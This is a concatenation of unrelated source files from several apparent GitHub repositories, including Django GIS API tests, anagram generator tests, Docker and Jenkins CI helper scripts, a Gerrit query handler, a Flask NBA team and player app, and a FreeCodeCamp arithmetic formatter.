expected_data = WorldBorderDetailSerializer(
country,
context={
'request': response.request
}
).data
# Silly issues with floats being rounded to different precisions
# between the serializer and the "round trip through the view" version
self.assertEqual(
expected_data['properties']['code'],
response.data['properties']['code']
)
class TestCountyBoundaryViews(LoginMixin, APITestCase):
def setUp(self):
super(TestCountyBoundaryViews, self).setUp()
self.list_url = reverse('api:mfl_gis:county_boundaries_list')
def test_listing(self):
mommy.make(CountyBoundary)
mommy.make(CountyBoundary)
boundary_list_response = self.client.get(self.list_url)
self.assertEqual(200, boundary_list_response.status_code)
self.assertEqual(2, len(boundary_list_response.data['results']))
class TestConstituencyBoundaryViews(LoginMixin, APITestCase):
def setUp(self):
super(TestConstituencyBoundaryViews, self).setUp()
self.list_url = reverse('api:mfl_gis:constituency_boundaries_list')
def test_listing(self):
mommy.make(ConstituencyBoundary)
mommy.make(ConstituencyBoundary)
boundary_list_response = self.client.get(self.list_url)
self.assertEqual(200, boundary_list_response.status_code)
self.assertEqual(2, len(boundary_list_response.data['results']))
class TestWardBoundaryViews(LoginMixin, APITestCase):
def setUp(self):
super(TestWardBoundaryViews, self).setUp()
self.list_url = reverse('api:mfl_gis:ward_boundaries_list')
def test_listing(self):
mommy.make(WardBoundary)
mommy.make(WardBoundary)
boundary_list_response = self.client.get(self.list_url)
self.assertEqual(200, boundary_list_response.status_code)
self.assertEqual(2, len(boundary_list_response.data['results']))
def test_get_single(self):
boundary = mommy.make(WardBoundary)
url = self.list_url + "{}/".format(boundary.id)
response = self.client.get(url)
self.assertEqual(200, response.status_code)
assert not response.data.get('properties').get('facility_ids')
class TestFacilityCoordinatesListing(LoginMixin, APITestCase):
def test_list_facility_coordinates(self):
url = reverse("api:mfl_gis:facility_coordinates_list")
ward = mommy.make(Ward)
const = mommy.make(Constituency)
county = mommy.make(County)
response = self.client.get(url)
self.assertIsInstance(response.data, list)
response = self.client.get(url)
self.assertIsInstance(response.data, list)
self.assertEquals(0, len(response.data))
# test ward filter
ward_url = url + "?ward={}".format(ward.id)
response = self.client.get(ward_url)
self.assertIsInstance(response.data, list)
self.assertEquals(0, len(response.data))
# test county
county_url = url + "?county={}".format(county.id)
response = self.client.get(county_url)
self.assertIsInstance(response.data, list)
self.assertEquals(0, len(response.data))
# test constituency
const_url = url + "?constituency={}".format(const.id)
response = self.client.get(const_url)
self.assertIsInstance(response.data, list)
self.assertEquals(0, len(response.data))
class TestPostingFacilityCoordinates(LoginMixin, APITestCase):
def setUp(self):
self.url = reverse("api:mfl_gis:facility_coordinates_simple_list")
super(TestPostingFacilityCoordinates, self).setUp()
def test_get(self):
mommy.make_recipe(
'mfl_gis.tests.facility_coordinates_recipe')
response = self.client.get(self.url)
self.assertEquals(200, response.status_code)
def test_retrieve(self):
facility_gps = mommy.make_recipe(
'mfl_gis.tests.facility_coordinates_recipe')
url = self.url + "{}/".format(str(facility_gps.id))
response = self.client.get(url)
self.assertEquals(200, response.status_code)
def test_create_facility_coordinates_success(self):
mommy.make_recipe(
'mfl_gis.tests.facility_coordinates_recipe')
facilities = Facility.objects.all()
ward = facilities[0].ward
facility = mommy.make(Facility, ward=ward)
method = mommy.make(GeoCodeMethod)
source = mommy.make(GeoCodeSource)
facility_coords = FacilityCoordinates.objects.all()
data = {
"facility": str(facility.id),
"method": str(method.id),
"source": str(source.id),
"coordinates": {
"type": "POINT",
"coordinates": [
facility_coords[0].coordinates[0],
facility_coords[0].coordinates[1]
]
}
}
url = self.url
response = self.client.post(url, data)
self.assertEquals(201, response.status_code)
self.assertEquals(2, FacilityCoordinates.objects.count())
def test_create_facility_coordinates_success_facility_approved(self):
mommy.make_recipe(
'mfl_gis.tests.facility_coordinates_recipe')
facilities = Facility.objects.all()
ward = facilities[0].ward
facility = mommy.make(Facility, ward=ward)
facility.approved = True
facility.save(allow_save=True)
facility_refetched = Facility.objects.get(id=facility.id)
self.assertTrue(facility_refetched.approved)
method = mommy.make(GeoCodeMethod)
source = mommy.make(GeoCodeSource)
facility_coords = FacilityCoordinates.objects.all()
data = {
"facility": facility.id,
"method": method.id,
"source": source.id,
"coordinates": {
"type": "POINT",
"coordinates": [
facility_coords[0].coordinates[0],
facility_coords[0].coordinates[1]
]
}
}
url = self.url
response = self.client.post(url, data)
self.assertEquals(201, response.status_code)
self.assertEquals(1, FacilityCoordinates.objects.count())
self.assertEquals(1, FacilityUpdates.objects.count())
update = FacilityUpdates.objects.all()[0]
approval_url = reverse(
"api:facilities:facility_updates_detail",
kwargs={'pk': str(update.id)})
approval_payload = {
"approved": True
}
approval_response = self.client.patch(approval_url, approval_payload)
self.assertEquals(200, approval_response.status_code)
self.assertEquals(2, FacilityCoordinates.objects.count())
def test_create_facility_coordinates_error(self):
mommy.make_recipe(
'mfl_gis.tests.facility_coordinates_recipe')
facilities = Facility.objects.all()
ward = facilities[0].ward
facility = mommy.make(Facility, ward=ward)
method = mommy.make(GeoCodeMethod)
source = mommy.make(GeoCodeSource)
facility_coords = FacilityCoordinates.objects.all()
data = {
"facility": str(facility.id),
"method": str(method.id),
"source": str(source.id),
"coordinates": {
"type": "POINT",
"coordinates": [
facility_coords[0].coordinates[1],
facility_coords[0].coordinates[0]
]
}
}
response = self.client.post(self.url, data)
self.assertEquals(400, response.status_code)
self.assertEquals(1, FacilityCoordinates.objects.count())
def test_update_facility_coordinates(self):
mommy.make_recipe(
'mfl_gis.tests.facility_coordinates_recipe')
method = mommy.make(GeoCodeMethod)
source = mommy.make(GeoCodeSource)
data = {
"method": str(method.id),
"source": str(source.id),
"coordinates": {
"type": "POINT",
"coordinates": [13525, 23525]
}
}
facility_coords = FacilityCoordinates.objects.all()
url = self.url + str(facility_coords[0].id) + "/"
response = self.client.patch(url, data)
self.assertEquals(400, response.status_code)
self.assertEquals(0, FacilityUpdates.objects.count())
def test_update_facility_coordinates_success(self):
mommy.make_recipe(
'mfl_gis.tests.facility_coordinates_recipe')
method = mommy.make(GeoCodeMethod)
source = mommy.make(GeoCodeSource)
facility_coords = FacilityCoordinates.objects.all()
facility = facility_coords[0].facility
facility.approved = True
facility.save(allow_save=True)
data = {
"facility": str(facility.id),
"method": str(method.id),
"source": str(source.id),
"coordinates": {
"type": "POINT",
"coordinates": [
facility_coords[0].coordinates[0],
facility_coords[0].coordinates[1]
]
}
}
url = self.url + str(facility_coords[0].id) + "/"
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
self.assertEquals(1, FacilityCoordinates.objects.count())
self.assertEquals(1, FacilityUpdates.objects.count())
# approve the facility updates
update = FacilityUpdates.objects.all()[0]
approval_url = reverse(
"api:facilities:facility_updates_detail",
kwargs={'pk': str(update.id)})
approval_payload = {
"approved": True
}
approval_response = self.client.patch(approval_url, approval_payload)
self.assertEquals(200, approval_response.status_code)
self.assertEquals(1, FacilityCoordinates.objects.count())
def test_update_facility_coordinates_success_facility_not_approved(self):
mommy.make_recipe(
'mfl_gis.tests.facility_coordinates_recipe')
method = mommy.make(GeoCodeMethod)
source = mommy.make(GeoCodeSource)
facility_coords = FacilityCoordinates.objects.all()
facility = facility_coords[0].facility
data = {
"facility": str(facility.id),
"method": str(method.id),
"source": str(source.id),
"coordinates": {
"type": "POINT",
"coordinates": [
facility_coords[0].coordinates[0],
facility_coords[0].coordinates[1]
]
}
}
url = self.url + str(facility_coords[0].id) + "/"
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
self.assertEquals(0, FacilityUpdates.objects.count())
self.assertEquals(1, FacilityCoordinates.objects.count())
def test_update_coordinates_only(self):
mommy.make_recipe(
'mfl_gis.tests.facility_coordinates_recipe')
facility_coords = FacilityCoordinates.objects.all()
facility = facility_coords[0].facility
facility.approved = True
facility.save(allow_save=True)
data = {
"facility": str(facility.id),
"coordinates": {
"type": "POINT",
"coordinates": [
facility_coords[0].coordinates[0],
facility_coords[0].coordinates[1]
]
}
}
url = self.url + str(facility_coords[0].id) + "/"
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
self.assertEquals(1, FacilityCoordinates.objects.count())
self.assertEquals(1, FacilityUpdates.objects.count())
update = FacilityUpdates.objects.all()[0]
approval_url = reverse(
"api:facilities:facility_updates_detail",
kwargs={'pk': str(update.id)})
approval_payload = {
"approved": True
}
approval_response = self.client.patch(approval_url, approval_payload)
self.assertEquals(200, approval_response.status_code)
self.assertEquals(1, FacilityCoordinates.objects.count())
class TestBoundaryBoundsView(LoginMixin, APITestCase):
def test_get_county_boundary(self):
boundary = mommy.make(CountyBoundary)
url = reverse(
"api:mfl_gis:county_bound",
kwargs={'pk': str(boundary.id)})
response = self.client.get(url)
self.assertEquals(200, response.status_code)
def test_get_constituency_boundary(self):
boundary = mommy.make(ConstituencyBoundary)
url = reverse(
"api:mfl_gis:constituency_bound",
kwargs={'pk': str(boundary.id)})
response = self.client.get(url)
self.assertEquals(200, response.status_code)
class TestIkoWapi(LoginMixin, APITestCase):
def setUp(self):
super(TestIkoWapi, self).setUp()
self.url = reverse("api:mfl_gis:ikowapi")
def test_invalid_lat_long(self):
resp = self.client.post(self.url, {
"longitude": "1.234",
"latitude": "32.234"
})
self.assertEqual(resp.status_code, 400)
self.assertIn("longitude", resp.data)
self.assertIn("latitude", resp.data, )
def test_invalid_lat(self):
resp = self.client.post(self.url, {
"longitude": 1.234,
"latitude": "32.234"
})
self.assertEqual(resp.status_code, 400)
self.assertNotIn("longitude", resp.data)
self.assertIn("latitude", resp.data)
def test_invalid_long(self):
resp = self.client.post(self.url, {
"longitude": "1.234",
"latitude": 32.234
})
self.assertEqual(resp.status_code, 400)
self.assertIn("longitude", resp.data)
self.assertNotIn("latitude", resp.data)
def test_find_ward_found(self):
mommy.make_recipe("mfl_gis.tests.ward_boundary_recipe")
resp = self.client.post(self.url, {
"longitude": 36.78378206656476,
"latitude": -1.2840274151085824
})
self.assertEqual(resp.status_code, 200)
for i in ['ward', 'constituency', 'county']:
self.assertIn(i, resp.data)
def test_find_ward_not_found(self):
mommy.make_recipe("mfl_gis.tests.ward_boundary_recipe")
resp = self.client.post(self.url, {
"longitude": 3.780612,
"latitude": -1.275611
})
self.assertEqual(resp.status_code, 400)
class TestDrillDownFacility(LoginMixin, APITestCase):
def setUp(self):
super(TestDrillDownFacility, self).setUp()
self.url = reverse("api:mfl_gis:drilldown_facility")
def test_listing(self):
mommy.make_recipe('mfl_gis.tests.facility_coordinates_recipe')
resp = self.client.get(self.url)
self.assertEqual(resp.status_code, 200)
class TestDrillDownCountry(LoginMixin, APITestCase):
def setUp(self):
super(TestDrillDownCountry, self).setUp()
self.url = reverse("api:mfl_gis:drilldown_country")
def test_get_listing(self):
mommy.make_recipe('mfl_gis.tests.county_boundary_recipe')
resp = self.client.get(self.url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data['meta']['name'], 'KENYA')
self.assertIsInstance(resp.data['geojson'], dict)
class TestDrillDownCounty(LoginMixin, APITestCase):
def setUp(self):
super(TestDrillDownCounty, self).setUp()
self.url = "api:mfl_gis:drilldown_county"
def test_get_listing(self):
cb = mommy.make_recipe('mfl_gis.tests.county_boundary_recipe')
mommy.make_recipe("mfl_gis.tests.constituency_boundary_recipe")
resp = self.client.get(
reverse(self.url, kwargs={"code": cb.area.code})
)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data['meta']['name'], cb.area.name)
self.assertIsInstance(resp.data['geojson'], dict)
class TestDrillDownConstituency(LoginMixin, APITestCase):
def setUp(self):
super(TestDrillDownConstituency, self).setUp()
self.url = "api:mfl_gis:drilldown_constituency"
def test_get_listing(self):
mommy.make_recipe('mfl_gis.tests.county_boundary_recipe')
cb2 = mommy.make_recipe("mfl_gis.tests.constituency_boundary_recipe")
mommy.make_recipe("mfl_gis.tests.ward_boundary_recipe")
resp = self.client.get(
reverse(self.url, kwargs={"code": cb2.area.code})
)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data['meta']['name'], cb2.area.name)
self.assertEqual(
resp.data['meta']['county_code'], cb2.area.county.code
)
self.assertIsInstance(resp.data['geojson'], dict)
class TestDrillDownWard(LoginMixin, APITestCase):
def setUp(self):
super(TestDrillDownWard, self).setUp()
self.url = "api:mfl_gis:drilldown_ward"
def test_get_listing(self):
wb = mommy.make_recipe("mfl_gis.tests.ward_boundary_recipe")
resp = self.client.get(
reverse(self.url, kwargs={"code": wb.area.code})
)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data['properties']['name'], wb.area.name)
self.assertEqual(
resp.data['properties']['county_code'],
wb.area.constituency.county.code
)
self.assertEqual(
resp.data['properties']['constituency_code'],
wb.area.constituency.code
)
self.assertEqual(
resp.data['id'], wb.area.code
)
self.assertIsInstance(resp.data['geometry'], dict)
```
#### File: management/commands/resend_user_emails.py
```python
from django.core.management import BaseCommand
from ...tasks import resend_user_signup_emails
class Command(BaseCommand):
def handle(self, *args, **kwargs):
resend_user_signup_emails()
```
#### File: users/tests/test_model_repr.py
```python
from django.test import TestCase
from common.tests import ModelReprMixin
from users import models
class TestModelRepr(ModelReprMixin, TestCase):
def test_user(self):
self.check_repr(
models.MflUser(first_name="fname", last_name="lname"),
"fname lname"
)
def test_oauth_app(self):
self.check_repr(
models.MFLOAuthApplication(name="app"),
"app"
)
self.check_repr(
models.MFLOAuthApplication(client_id="client id"),
"client id"
)
def test_custom_group(self):
g = models.Group.objects.create(name="ha")
self.check_repr(models.CustomGroup(group=g), "ha")
def test_proxy_group(self):
self.check_repr(models.ProxyGroup(name="ha"), "ha")
```
|
{
"source": "jenky64/anagram",
"score": 2
}
|
#### File: jenky64/anagram/noxfile.py
```python
import nox
@nox.session(python=["3.8"],venv_backend="conda")
def tests(session):
session.conda_install('--file','package-list.txt')
session.run('conda',
'develop',
'.',
'--prefix',
session.virtualenv.location)
session.run('pytest')
@nox.session(python=["3.8"],venv_backend="conda")
def lint(session):
session.conda_install('flake8')
session.run('flake8', 'anagram/')
```
#### File: anagram/tests/test_generator.py
```python
from anagram.generator import Generator
from pathlib import Path
import pytest
generator = Generator()
@pytest.mark.order(1)
def test_initialize_db():
db_name = '/'.join((str(Path(__file__).resolve().parent),'collins.db'))
generator.initialize_db(db_name=db_name)
table = generator.database.get_tables()[0]
assert table == 'words'
@pytest.mark.order(2)
def test_get_stats():
generator.get_stats()
assert generator.max_word_length == 15
assert generator.word_count == 279496
@pytest.mark.order(3)
def test_set_word_set_size_one():
generator.set_word(word='python')
assert generator.word == ['h', 'n', 'o', 'p', 't', 'y']
assert generator.min_size == 2
assert generator.max_size == 7
assert generator.size is None
@pytest.mark.order(4)
def test_set_word_set_size_two():
generator.set_word(word='numbers', min_size=3, max_size=4)
assert generator.word == ['b', 'e', 'm', 'n', 'r', 's', 'u']
assert generator.min_size == 3
assert generator.max_size == 5
assert generator.size is None
@pytest.mark.order(5)
def test_set_word_set_size_three():
generator.set_word(word='regis', size=4)
assert generator.word == ['e', 'g', 'i', 'r', 's']
assert generator.min_size == 4
assert generator.max_size == 5
assert generator.size is None
@pytest.mark.order(6)
def test_generate_anagrams_one():
generator.set_word('stop')
generator.generate_anagrams()
expected = {2: ['op', 'os', 'po', 'so', 'st', 'to'],
3: ['ops', 'opt', 'pos', 'pot', 'pst', 'sop', 'sot', 'top'],
4: ['opts', 'post', 'pots', 'spot', 'stop', 'tops']}
assert generator.anagrams == expected
@pytest.mark.order(7)
def test_generate_anagrams_two():
generator.set_word('python', min_size=3, max_size=4)
generator.generate_anagrams()
expected = {3: ['hon', 'hop', 'hot', 'hoy', 'hyp', 'noh', 'not', 'noy', 'nth', 'ony', 'opt',
'pho', 'pht', 'poh', 'pot', 'tho', 'thy', 'ton', 'top', 'toy', 'yon'],
4: ['hypo', 'phon', 'phot', 'pont', 'pony', 'pyot', 'thon', 'tony',
'toph', 'typo', 'yont']}
assert generator.anagrams == expected
@pytest.mark.order(8)
def test_generate_anagrams_three():
generator.set_word('development', size=7)
generator.generate_anagrams()
expected = {7: ['demeton', 'deplete', 'develop', 'devotee', 'dolente', 'dovelet',
'element', 'enmoved', 'envelop', 'evented', 'lemoned', 'leptome',
'pentode', 'teendom', 'telemen', 'templed', 'venomed']}
assert generator.anagrams == expected
```
|
{
"source": "jenky64/msds692",
"score": 2
}
|
#### File: scripts/docker/build.py
```python
import argparse
import docker
import sys
import shutil
from filecmp import cmp
from pathlib import Path, PurePath
docker_check_files = [('dockerfile.prev','dockerfile'),
('testing-modules-list.prev','testing-modules-list.txt')]
def setup():
"""
create and return docker client
:return: docker client
"""
return docker.from_env()
def build_image(client, wkspc_dir: str, tag: str) -> bool:
"""
rebuild the docker container if required
:param client:
:param wkspc_dir: jenkins workpspace name
:param tag: docker image tag
:return: T/F
"""
# first create the build directory
build_dir: str = '/'.join(['/volumes', PurePath(wkspc_dir).name])
# attempt to build the image
# if it is successful return True
# if it fails return False
try:
client.images.build(path=build_dir,
tag=tag,
forcerm=True)
except (docker.errors.BuildError, docker.errors.APIError):
return False
return True
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-d','--dir')
parser.add_argument('-t','--tag')
args = parser.parse_args()
client = setup()
if args.dir and args.tag:
wkspc_dir = args.dir
tag = args.tag
ret = build_image(client=client,
wkspc_dir=wkspc_dir,
tag=tag)
if ret:
sys.exit(0)
else:
sys.exit(1)
else:
pass
```
#### File: scripts/docker/run.py
```python
import argparse
import logging
import docker
import sys
import shutil
from filecmp import cmp
from pathlib import Path, PurePath
docker_check_files = [('dockerfile.prev','dockerfile'),
('testing-modules-list.prev','testing-modules-list.txt')]
def setup():
"""
setup and return the docker client
:return: docker client
"""
return docker.from_env()
def run_image(client, image: str, wkspc_dir: str) -> bool:
"""
run the docker image
:param client: docker client
:param image: docker image name
:param wkspc_dir: jenkins workspace directory name
:return: T/F
"""
ret = True
# verify the volume branch /volumes directory exists
vol_dir = '/'.join(['/volumes', PurePath(wkspc_dir).name])
if not Path(vol_dir).exists():
return False
# these are the filesystems that the image is
# going to mount as volumes
# wkspc_dir is the jenkins workspace directory
# vol_dir is the branch directory under /volumes
volumes = { wkspc_dir: {'bind': '/app', 'mode': 'rw'},
vol_dir: {'bind': '/backup', 'mode': 'rw'}
}
# create unique name for the docker container
# this will prevent name conflicts for branches
# in different repositories that have the same name
container_name = PurePath(wkspc_dir).name
command='/app/runtests.py'
try:
client.containers.run(image=image,
command=command,
name=container_name,
volumes=volumes,
remove=True,
detach=False)
except docker.errors.APIError:
ret = False
finally:
pass
return ret
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-d','--dir')
parser.add_argument('-i','--image')
args = parser.parse_args()
client = setup()
if args.dir and args.image:
wkspc_dir = args.dir
image = args.image
ret = run_image(client, image=image, wkspc_dir=wkspc_dir)
if ret:
sys.exit(0)
else:
sys.exit(1)
else:
sys.exit(1)
```
#### File: scripts/docker/validate.py
```python
import argparse
import sys
from filecmp import cmp
from pathlib import Path, PurePath
# files that need to exist for the image to be validated
docker_check_files = [('dockerfile.prev', 'dockerfile'),
('testing-modules-list.prev', 'testing-modules-list.txt')]
def validate_docker_image(wkspc_dir: str) -> bool:
"""
:param wkspc_dir: jenkins workspace directory name
:return: T/F
"""
# get the branch directory name under /volumes
vol_dir = '/'.join(['/volumes', PurePath(wkspc_dir).name])
# iterate over files and compare the copy in
# the workspace directory to the backup copy
# in the branch volumes directory
for file_names in docker_check_files:
src_file = '/'.join([wkspc_dir, file_names[1]])
chk_file = '/'.join([vol_dir, file_names[0]])
# if the files does not exist return false
try:
val = cmp(src_file, chk_file)
except OSError as e:
val = False
# the comparison will return 0 if they
# are the same, otherwise 1
# if we get even one that does not validate
# we exit
if not val:
break
if val:
return True
else:
return False
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-d','--dir')
args = parser.parse_args()
if args.dir:
wkspc_dir = args.dir
ret = validate_docker_image(wkspc_dir=wkspc_dir)
if ret:
sys.exit(0)
else:
sys.exit(1)
else:
sys.exit(1)
```
#### File: scripts/git/delete_commit.py
```python
import argparse
import logging
import sys
import shutil
from pathlib import Path, PurePath
def delete_commit(wkspc_dir) -> str:
"""
the commit tag of the most recent commit
whose tests passed is save in a file.
this function deletes the file
:param wkspc_dir: jenkins workspace directory
:return:
"""
vol_dir = '/'.join(['/volumes', PurePath(wkspc_dir).name])
if not Path(vol_dir).exists():
return False
commit_path = Path('/'.join([vol_dir, 'commit.txt']))
try:
commit_path.unlink()
except Exception:
return False
return True
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-d','--dir')
args = parser.parse_args()
if args.dir:
wkspc_dir = args.dir
ret = delete_commit(wkspc_dir=wkspc_dir)
if ret:
sys.exit(0)
else:
sys.exit(1)
else:
sys.exit(1)
```
#### File: scripts/git/read_commit.py
```python
import argparse
import logging
import sys
import shutil
from pathlib import Path, PurePath
def read_commit(wkspc_dir) -> str:
"""
read and return the value
in the commit file
:param wkspc_dir: jenkins workspace dicrectory
:return: commit tag value
"""
commit = 'false'
# confirm branch directory exists
vol_dir = '/'.join(['/volumes', PurePath(wkspc_dir).name])
if not Path(vol_dir).exists():
return commit
commit_path = Path('/'.join([vol_dir, 'commit.txt']))
# read commit value and return it.
# or return 'false'
try:
commit = commit_path.read_text()
except Exception:
pass
return commit
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-d','--dir')
args = parser.parse_args()
if args.dir:
wkspc_dir = args.dir
commit = read_commit(wkspc_dir=wkspc_dir)
print(f'{commit}')
else:
print(f'false')
```
|
{
"source": "JenMeyer/CodeCollabCrawler",
"score": 3
}
|
#### File: JenMeyer/CodeCollabCrawler/GerritQueryHandler.py
```python
import requests
import ast
import re
import pprint
from typing import List, Union, Dict, Optional, Tuple
class GerritQueryHandler:
"""
Handles the execution of the requests and the formatting of the responses.
"""
def __init__(self, url: str, beforeDate: str = None, afterDate: str = None) -> None:
"""
Initializes the Query Handler with url and optional time parameters.
:param url: The url of the request, should be one the endpoints of the REST API.
:type url: str
:param beforeDate: Optional. A possible date for a 'before' parameter in your query. It has to be in the format
of yyyy-mm-dd.
:type beforeDate: str
:param afterDate: Optional. A possible date for a 'after' parameter in your query. It has to be in the format
of yyyy-mm-dd.
:type afterDate: str
"""
self.session = requests.session()
self.url = url
#optional request parameters
self.before = beforeDate
self.after = afterDate
def buildURL(self, user: str, startpoint: int) -> str:
"""
Builds the request url out the given parameters.
:param user: The respective user of the request
:type user: str
:param startpoint: The startpoint of the query. Necessary as the response amount is restricted and the request
needs to be executed multiple times with different startpoints.
:type startpoint: int
:return: The final request url
:rtype: str
"""
url = self.url
if self.url[-1] != '/':
url += '/'
#enters user into request url
url += '?q=owner:' + user
#adds optional time params
if self.before:
url += '+before:' + self.before
if self.after:
url +='+after:' + self.after
#adds the startpoint
url += '&S=' + str(startpoint)
#print(url)
return url
#makes request for commits and returns it as formatted list
def getCommits(self, user: str, startpoint: int) -> Tuple[List[Dict], bool, bool]:
"""
Executes the request and gets all commits fitting the parameters belonging to the user.
:param user: The respective user of the request
:type user: str
:param startpoint: The startpoint of the query. Necessary as the response amount is restricted and the request
needs to be executed multiple times with different startpoints.
:type startpoint: int
:return: Returns the commitList which contains the commits as dictionaries, if there are no commits it will
be an empty list. Also returns if the request ist finished and if the user is active.
:rtype: Tuple[List[Dict], bool, bool]
"""
active = True
url = self.buildURL(user, startpoint)
#actual request
userCommitsTime = self.session.get(url)
#for control
#print(userCommitsTime.text)
#handles inactive accounts
if "following exact account" in userCommitsTime.text:
print("inactive!")
active = False
#extracts userID for inactive account
ID_candidate = re.findall(r'(\d+):', userCommitsTime.text)
if ID_candidate:
url = self.buildURL(ID_candidate[0], startpoint)
userCommitsTime = self.session.get(url)
else:
print("Error: no ID_candidate" + user)
print(userCommitsTime.text)
commitsList, notDone = self.formatStringToList(userCommitsTime)
return commitsList, notDone, active
def formatStringToList(self, string: str) -> Tuple[List[Dict], bool]:
"""
Formats the text of the response (string) into a list of dictionaries.
:param string: The to be formatted text.
:type string: str
:return: Returns the formatted list and if the request is finished
:rtype: Tuple[List[Dict], bool]
"""
#cuts first line
commitsString = string.text.split("\n", 1)[1]
if commitsString == '':
return [], False
#checks for more changes, sets notDone accordingly
if '"_more_changes": true' in commitsString:
commitsString = commitsString.replace('"_more_changes": true\n', '')
notDone = True
else:
notDone = False
commitsString = commitsString.replace('true', 'True').replace('false', 'False')
# print(user)
# print(commitsString)
#converts string to a list
commitsList = ast.literal_eval(commitsString)
return commitsList, notDone
```
|
{
"source": "jenminni/misy350-s18-finalapp",
"score": 3
}
|
#### File: jenminni/misy350-s18-finalapp/nba.py
```python
import os
from flask import Flask, render_template, request, redirect, url_for, jsonify
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
# setting up SQLAlchemy
basedir = os.path.abspath(os.path.dirname(__file__))
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'data.sqlite')
db = SQLAlchemy(app)
# defining database tables
class Team(db.Model):
__tablename__ = 'teams'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Text)
location = db.Column(db.Text)
team_colors = db.Column(db.Text)
players = db.relationship('Player', backref='team', cascade='delete')
class Player(db.Model):
__tablename__ = 'players'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Text)
age = db.Column(db.Integer)
height = db.Column(db.Text)
weight = db.Column(db.Text)
position = db.Column(db.Text)
jersey_num = db.Column(db.Integer)
team_id = db.Column(db.Integer, db.ForeignKey('teams.id'))
@app.route('/')
def index():
return render_template('index.html')
@app.route('/about')
def about():
return render_template('about.html')
@app.route('/teams')
def all_teams():
teams = Team.query.all()
return render_template('all-teams.html', teams=teams)
@app.route('/players')
def all_players():
players = Player.query.all()
return render_template('all-players.html', players=players)
@app.route('/teams/edit/<int:id>', methods=['GET', 'POST'])
def teams_edit(id):
teams = Team.query.filter_by(id=id).first()
if request.method == 'GET': # show the form to update
return render_template('team-edit.html', teams=teams)
if request.method == 'POST': # this is update
teams.name = request.form['name']
teams.location = request.form['location']
teams.team_colors = request.form['team_colors']
db.session.commit()
return redirect(url_for('all_teams'))
@app.route('/players/edit/<int:id>', methods=['GET', 'POST'])
def players_edit(id):
players = Player.query.filter_by(id=id).first()
if request.method == 'GET': # show the form to update
return render_template('player-edit.html', players=players)
if request.method == 'POST': # this is update
players.name = request.form['name']
players.age = request.form['age']
players.height = request.form['height']
players.weight = request.form['weight']
players.position = request.form['position']
players.jersey_num = request.form['jersey_num']
db.session.commit()
return redirect(url_for('all_players'))
@app.route('/api/teams/<int:id>', methods=['DELETE'])
def delete_ajax_teams(id):
teams = Team.query.get_or_404(id)
db.session.delete(teams)
db.session.commit()
return jsonify({"id": str(teams.id), "name": teams.name})
@app.route('/api/players/<int:id>', methods=['DELETE'])
def delete_ajax_players(id):
players = Player.query.get_or_404(id)
db.session.delete(players)
db.session.commit()
return jsonify({"id": str(players.id), "name": players.name})
@app.route('/teams/add', methods=['GET', 'POST'])
def add_teams():
if request.method == 'GET':
return render_template('teams-add.html')
if request.method == 'POST':
# get data from the form
name = request.form['name']
location = request.form['location']
team_colors = request.form['team_colors']
# insert the data into the database
teams = Team(name=name, location=location, team_colors=team_colors)
db.session.add(teams)
db.session.commit()
return redirect(url_for('all_teams'))
@app.route('/players/add', methods=['GET', 'POST'])
def add_players():
if request.method == 'GET':
teams = Team.query.all()
return render_template('players-add.html', teams=teams)
if request.method == 'POST':
# get data from the form
name = request.form['name']
age = request.form['age']
height = request.form['height']
weight = request.form['weight']
position = request.form['position']
jersey_num = request.form['jersey_num']
team_name = request.form['team']
team = Team.query.filter_by(name=team_name).first()
# insert data into the database
players = Player(name=name, age=age, height=height, weight=weight, position=position, jersey_num=jersey_num, team=team)
db.session.add(players)
db.session.commit()
return redirect(url_for('all_players'))
if __name__ == '__main__':
app.run()
```
|
{
"source": "jenmiu2/FreeCodeCamp",
"score": 4
}
|
#### File: Scientific Computing with Python Certification/Aritmetic Formatter/arithmetic_arranger.py
```python
import re
def arithmetic_arranger(problems, arranged=False):
if len(problems) < 1: return ''
if len(problems) > 5: return "Error: Too many problems."
# check *,\, ++, *+
for problem in problems:
matches = re.findall(r'(\s(\+|\-)\s(?!(\+|\-)))', problem)
if len(matches) == 0: return "Error: Operator must be '+' or '-'."
# check contain digits
for problem in problems:
matches = re.findall(r'[a-z]', problem)
if len(matches) > 0: return "Error: Numbers must only contain digits."
for problem in problems:
matches = re.findall(r'((\b)\d{1,4})\s(\+|\-)\s(\d{1,4}(?!\d))',
problem)
if len(matches) == 0:
return "Error: Numbers cannot be more than four digits."
# formatear el string
operand1 = "{:2}".format("")
operand2 = ""
dashes = ""
resOp = "{:1}".format("")
for i, problem in enumerate(problems):
matches = problem.split(" ")
op1str = matches[0]
op1 = int(op1str)
op2str = matches[2]
op2 = int(op2str)
operation = matches[1]
maxlenth = len(op1str) if len(op1str) >= len(op2str) else len(op2str)
# assign operand 1
operand1 += "{:>{op}}{:6}".format(op1, " ", op=maxlenth)
# assign operand 2
operand2 += "{op} {:>{lenth}}{:4}".format(op2, " ", lenth=maxlenth, op=operation)
# assign dashes
dashes += "{:-<{op}}{:4}".format("", " ", op=maxlenth + 2)
# assign result
if operation == '+':
res = op1 + op2
elif operation == '-':
res = op1 - op2
numSep = 4 if maxlenth == 3 else 3
if arranged:
resOp += "{:{lenth}}{:{sep}}".format(res, " ", sep=5, lenth=numSep)
if arranged:
arranged_problems = operand1.rstrip() + '\n' + operand2.rstrip() + '\n' + dashes.rstrip() + '\n' + resOp.rstrip()
else:
arranged_problems = operand1.rstrip() + '\n' + operand2.rstrip() + '\n' + dashes.rstrip()
return arranged_problems
```
#### File: Scientific Computing with Python Certification/Probability Calculator/prob_calculator.py
```python
import copy
import random
from collections import Counter
# Consider using the modules imported above.
class Hat:
